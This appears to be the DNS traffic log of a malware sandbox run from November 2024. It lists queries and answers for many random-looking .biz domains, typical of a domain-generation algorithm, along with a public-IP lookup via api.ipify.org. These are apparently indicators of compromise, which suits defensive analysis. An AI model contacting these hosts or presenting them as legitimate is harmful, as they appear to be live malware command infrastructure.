                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.950757980 CET192.168.2.71.1.1.10xf7bfStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.633313894 CET192.168.2.71.1.1.10xb136Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.041965961 CET192.168.2.71.1.1.10xf1caStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.051306963 CET192.168.2.71.1.1.10x8f44Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.083432913 CET192.168.2.71.1.1.10x8f44Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.619079113 CET192.168.2.71.1.1.10xae01Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.627181053 CET192.168.2.71.1.1.10x539aStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.636077881 CET192.168.2.71.1.1.10x41Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.248106956 CET1.1.1.1192.168.2.70x9fceNo error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:49.984246969 CET1.1.1.1192.168.2.70x3aaaNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.651669025 CET1.1.1.1192.168.2.70x1300No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.664040089 CET1.1.1.1192.168.2.70x7aefNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.416670084 CET1.1.1.1192.168.2.70x78cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.416670084 CET1.1.1.1192.168.2.70x78cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.416670084 CET1.1.1.1192.168.2.70x78cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.174644947 CET1.1.1.1192.168.2.70xbeb5No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.031927109 CET1.1.1.1192.168.2.70x75d6No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.528867960 CET1.1.1.1192.168.2.70x666dNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.366476059 CET1.1.1.1192.168.2.70x72aeNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.366476059 CET1.1.1.1192.168.2.70x72aeNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.077708960 CET1.1.1.1192.168.2.70xd5dbNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.051517010 CET1.1.1.1192.168.2.70x5f52Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.087091923 CET1.1.1.1192.168.2.70x49a3No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.243105888 CET1.1.1.1192.168.2.70xa385No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.424886942 CET1.1.1.1192.168.2.70xbe0eNo error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.712097883 CET1.1.1.1192.168.2.70x1350No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.712097883 CET1.1.1.1192.168.2.70x1350No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.850912094 CET1.1.1.1192.168.2.70xe226Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.858913898 CET1.1.1.1192.168.2.70xed65Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.868942022 CET1.1.1.1192.168.2.70x4c37No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.011353970 CET1.1.1.1192.168.2.70x4cffName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.020252943 CET1.1.1.1192.168.2.70x5665No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.522102118 CET1.1.1.1192.168.2.70x5e36Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.544502974 CET1.1.1.1192.168.2.70x6ab1Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.552829981 CET1.1.1.1192.168.2.70xfda4No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.350311995 CET1.1.1.1192.168.2.70xe04eNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:20.044460058 CET1.1.1.1192.168.2.70xa8b5No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.522300959 CET1.1.1.1192.168.2.70x9eafNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.551548958 CET1.1.1.1192.168.2.70xaf26No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.171281099 CET1.1.1.1192.168.2.70x7ba2No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.184458017 CET1.1.1.1192.168.2.70xc01aNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.033684969 CET1.1.1.1192.168.2.70xaf0No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.533359051 CET1.1.1.1192.168.2.70x36deNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.167733908 CET1.1.1.1192.168.2.70x2f98No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.852483034 CET1.1.1.1192.168.2.70x6b73No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.852483034 CET1.1.1.1192.168.2.70x6b73No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.221879005 CET1.1.1.1192.168.2.70x7bd8Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.239085913 CET1.1.1.1192.168.2.70x5504No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.754686117 CET1.1.1.1192.168.2.70x4e59No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.040740013 CET1.1.1.1192.168.2.70x795bName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.049161911 CET1.1.1.1192.168.2.70x63daName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.057276964 CET1.1.1.1192.168.2.70x2103No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.545430899 CET1.1.1.1192.168.2.70x6f18No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.314340115 CET1.1.1.1192.168.2.70xda58No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.176382065 CET1.1.1.1192.168.2.70x7ce3No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.850183964 CET1.1.1.1192.168.2.70x1daeNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.850183964 CET1.1.1.1192.168.2.70x1daeNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.583297014 CET1.1.1.1192.168.2.70x84a2No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.857367039 CET1.1.1.1192.168.2.70x39fdNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.416353941 CET1.1.1.1192.168.2.70xac9No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.635176897 CET1.1.1.1192.168.2.70x8884No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.272682905 CET1.1.1.1192.168.2.70x968cNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.193126917 CET1.1.1.1192.168.2.70x5cb7No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.214354992 CET1.1.1.1192.168.2.70x32a5No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.520189047 CET1.1.1.1192.168.2.70xf755No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.394349098 CET1.1.1.1192.168.2.70xfd74No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.394349098 CET1.1.1.1192.168.2.70xfd74No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.058674097 CET1.1.1.1192.168.2.70xfdc3No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.880330086 CET1.1.1.1192.168.2.70xb9a2No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.894934893 CET1.1.1.1192.168.2.70x448bNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:53.008541107 CET1.1.1.1192.168.2.70x2c8dNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:54.885571003 CET1.1.1.1192.168.2.70xc556No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.161777020 CET1.1.1.1192.168.2.70x5bc5No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.391324043 CET1.1.1.1192.168.2.70x8a91No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.467752934 CET1.1.1.1192.168.2.70x92ccNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.419487000 CET1.1.1.1192.168.2.70xd97eNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.117012024 CET1.1.1.1192.168.2.70xa1d1No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.227364063 CET1.1.1.1192.168.2.70x6d0eNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.126497030 CET1.1.1.1192.168.2.70x87e5No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.782782078 CET1.1.1.1192.168.2.70x42e0No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.056792974 CET1.1.1.1192.168.2.70x354No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.511260986 CET1.1.1.1192.168.2.70x3597No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.577342987 CET1.1.1.1192.168.2.70x9824No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.592994928 CET1.1.1.1192.168.2.70x33a8No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.071193933 CET1.1.1.1192.168.2.70xf3eNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.433407068 CET1.1.1.1192.168.2.70x74deNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.910845041 CET1.1.1.1192.168.2.70x14b3No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.485814095 CET1.1.1.1192.168.2.70x7cadNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.485814095 CET1.1.1.1192.168.2.70x7cadNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.602847099 CET1.1.1.1192.168.2.70x6a45No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.858747959 CET1.1.1.1192.168.2.70x8c3bNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.022099018 CET1.1.1.1192.168.2.70x331fNo error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.834522009 CET1.1.1.1192.168.2.70x3a4fNo error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.850425959 CET1.1.1.1192.168.2.70x3607No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.589813948 CET1.1.1.1192.168.2.70xe211No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.053208113 CET1.1.1.1192.168.2.70x3e30No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.392167091 CET1.1.1.1192.168.2.70x5e72No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.161825895 CET1.1.1.1192.168.2.70x3ec0No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.845679045 CET1.1.1.1192.168.2.70x3af1No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.536998987 CET1.1.1.1192.168.2.70xfde3No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.736834049 CET1.1.1.1192.168.2.70x9366No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.410137892 CET1.1.1.1192.168.2.70x7a25No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.455589056 CET1.1.1.1192.168.2.70xe9d9No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.604002953 CET1.1.1.1192.168.2.70x3fe9No error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.965157986 CET1.1.1.1192.168.2.70x5042No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.965228081 CET1.1.1.1192.168.2.70x5042No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.645634890 CET1.1.1.1192.168.2.70xde67No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.645634890 CET1.1.1.1192.168.2.70xde67No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.535950899 CET1.1.1.1192.168.2.70x1c66No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.736596107 CET1.1.1.1192.168.2.70xe84bNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.395344973 CET1.1.1.1192.168.2.70xf8e5No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.702584982 CET1.1.1.1192.168.2.70x3997No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.819679976 CET1.1.1.1192.168.2.70x451cNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.552053928 CET1.1.1.1192.168.2.70x1eb6No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.424454927 CET1.1.1.1192.168.2.70x3727No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.168678045 CET1.1.1.1192.168.2.70x2a60No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.899163008 CET1.1.1.1192.168.2.70x28c5No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.597253084 CET1.1.1.1192.168.2.70x4373No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.761904001 CET1.1.1.1192.168.2.70xe2acNo error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.286314964 CET1.1.1.1192.168.2.70x3bc8No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.550678015 CET1.1.1.1192.168.2.70x94d4No error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.795870066 CET1.1.1.1192.168.2.70xebd1No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.643652916 CET1.1.1.1192.168.2.70x4a3dNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.308984041 CET1.1.1.1192.168.2.70x998No error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.333270073 CET1.1.1.1192.168.2.70xb230No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.452539921 CET1.1.1.1192.168.2.70x3e0fNo error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.836853981 CET1.1.1.1192.168.2.70x7c97No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.527332067 CET1.1.1.1192.168.2.70x6f74No error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.295272112 CET1.1.1.1192.168.2.70x5191No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.481640100 CET1.1.1.1192.168.2.70xf2f8No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.370089054 CET1.1.1.1192.168.2.70xcb68No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.158102989 CET1.1.1.1192.168.2.70x8ebeNo error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.857180119 CET1.1.1.1192.168.2.70x74fNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.343651056 CET1.1.1.1192.168.2.70x8ce0No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.419786930 CET1.1.1.1192.168.2.70x553dNo error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:40.291702986 CET1.1.1.1192.168.2.70x7f6dNo error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.078186989 CET1.1.1.1192.168.2.70xfde7No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.360186100 CET1.1.1.1192.168.2.70xf70eNo error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.037107944 CET1.1.1.1192.168.2.70xa39aNo error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.598587036 CET1.1.1.1192.168.2.70xefcaNo error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.032479048 CET1.1.1.1192.168.2.70x8795No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.198086977 CET1.1.1.1192.168.2.70x4d43No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.570436954 CET1.1.1.1192.168.2.70xb871No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.483695984 CET1.1.1.1192.168.2.70x78cfNo error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
